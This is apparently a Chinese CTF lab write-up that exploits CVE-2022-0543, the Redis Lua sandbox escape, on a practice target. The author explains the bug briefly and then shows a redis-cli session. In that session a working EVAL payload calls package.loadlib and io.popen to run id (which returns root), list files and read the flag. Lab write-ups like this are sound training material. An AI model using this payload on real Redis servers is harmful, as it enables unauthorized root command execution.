CVE-2022-0543
信息
Redis 是著名的开源 Key-Value 数据库,其具备在沙箱中执行 Lua 脚本(EVAL 命令)的能力。Debian 以及 Ubuntu 发行版的源在打包 Redis 时,不慎在 Lua 沙箱中遗留了一个 package 对象,攻击者可以利用这个对象提供的方法加载动态链接库 liblua 里的函数,进而逃逸沙箱执行任意命令。
根据上述漏洞信息,直接用 redis-cli 连接目标并交互即可。
┌──(randark㉿kali)-[~]
└─$ redis-cli -h e51d46e4-a28b-4ee5-9fb6-6c7e767955b0-488.cyberstrikelab.com -p 37330
e51d46e4-a28b-4ee5-9fb6-6c7e767955b0-488.cyberstrikelab.com:37330> KEYS *;
(empty array)
e51d46e4-a28b-4ee5-9fb6-6c7e767955b0-488.cyberstrikelab.com:37330> eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0
"uid=0(root) gid=0(root) groups=0(root)\n"
(10.12s)
e51d46e4-a28b-4ee5-9fb6-6c7e767955b0-488.cyberstrikelab.com:37330> eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("pwd", "r"); local res = f:read("*a"); f:close(); return res' 0
"/var/lib/redis\n"
e51d46e4-a28b-4ee5-9fb6-6c7e767955b0-488.cyberstrikelab.com:37330> eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("ls -lh /", "r"); local res = f:read("*a"); f:close(); return res' 0
"total 4.0K\nlrwxrwxrwx 1 root root 7 Mar 2 2022 bin -> usr/bin\ndrwxr-xr-x 2 root root 10 Apr 15 2020 boot\ndrwxr-xr-x 5 root root 360 Apr 23 14:41 dev\ndrwxr-xr-x 1 root root 86 Apr 23 14:41 etc\n-rwxr-xr-x 1 root root 152 Dec 11 05:58 flag.sh\ndrwxr-xr-x 2 root root 10 Apr 15 2020 home\nlrwxrwxrwx 1 root root 7 Mar 2 2022 lib -> usr/lib\nlrwxrwxrwx 1 root root 9 Mar 2 2022 lib32 -> usr/lib32\nlrwxrwxrwx 1 root root 9 Mar 2 2022 lib64 -> usr/lib64\nlrwxrwxrwx 1 root root 10 Mar 2 2022 libx32 -> usr/libx32\ndrwxr-xr-x 2 root root 10 Mar 2 2022 media\ndrwxr-xr-x 2 root root 10 Mar 2 2022 mnt\ndrwxr-xr-x 2 root root 10 Mar 2 2022 opt\ndr-xr-xr-x 4344 root root 0 Apr 23 14:41 proc\ndrwx------ 2 root root 49 Mar 2 2022 root\ndrwxr-xr-x 1 root root 29 Apr 23 14:41 run\nlrwxrwxrwx 1 root root 8 Mar 2 2022 sbin -> usr/sbin\ndrwxr-xr-x 2 root root 10 Mar 2 2022 srv\ndr-xr-xr-x 13 root root 0 Apr 23 14:41 sys\ndrwxrwxrwt 1 root root 30 Apr 23 14:41 tmp\ndrwxr-xr-x 1 root root 57 Mar 2 2022 usr\ndrwxr-xr-x 1 root root 40 Mar 2 2022 var\n"
(2.38s)
e51d46e4-a28b-4ee5-9fb6-6c7e767955b0-488.cyberstrikelab.com:37330> eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("/flag.sh", "r"); local res = f:read("*a"); f:close(); return res' 0
"18:C 23 Apr 2025 14:45:23.601 # oO0OoO0OoO0Oo Redis is starting oO0OoO0OoO0Oo\n18:C 23 Apr 2025 14:45:23.601 # Redis version=5.0.7, bits=64, commit=00000000, modified=0, pid=18, just started\n18:C 23 Apr 2025 14:45:23.601 # Configuration loaded\n18:M 23 Apr 2025 14:45:23.601 # Could not create server TCP listening socket 0.0.0.0:6379: bind: Address already in use\n"
e51d46e4-a28b-4ee5-9fb6-6c7e767955b0-488.cyberstrikelab.com:37330> eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("cat /flag.sh", "r"); local res = f:read("*a"); f:close(); return res' 0
"#!/bin/bash\n# \xe8\xbe\x93\xe5\x87\xba\xe7\x8e\xaf\xe5\xa2\x83\xe5\x8f\x98\xe9\x87\x8f $flag \xe7\x9a\x84\xe5\x86\x85\xe5\xae\xb9\xe5\x88\xb0 /tmp/flag.txt\necho $flag > /tmp/flag.txt\n# \xe6\x89\xa7\xe8\xa1\x8c\xe7\x9a\x84\xe5\x90\xaf\xe5\x8a\xa8\xe8\x84\x9a\xe6\x9c\xac\nredis-server /etc/redis/redis.conf\n"
(1.62s)
e51d46e4-a28b-4ee5-9fb6-6c7e767955b0-488.cyberstrikelab.com:37330> eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("cat /tmp/flag.txt", "r"); local res = f:read("*a"); f:close(); return res' 0
"go-flag{c0c62457-e009-451b-9ec9-557b674bec1e}\n"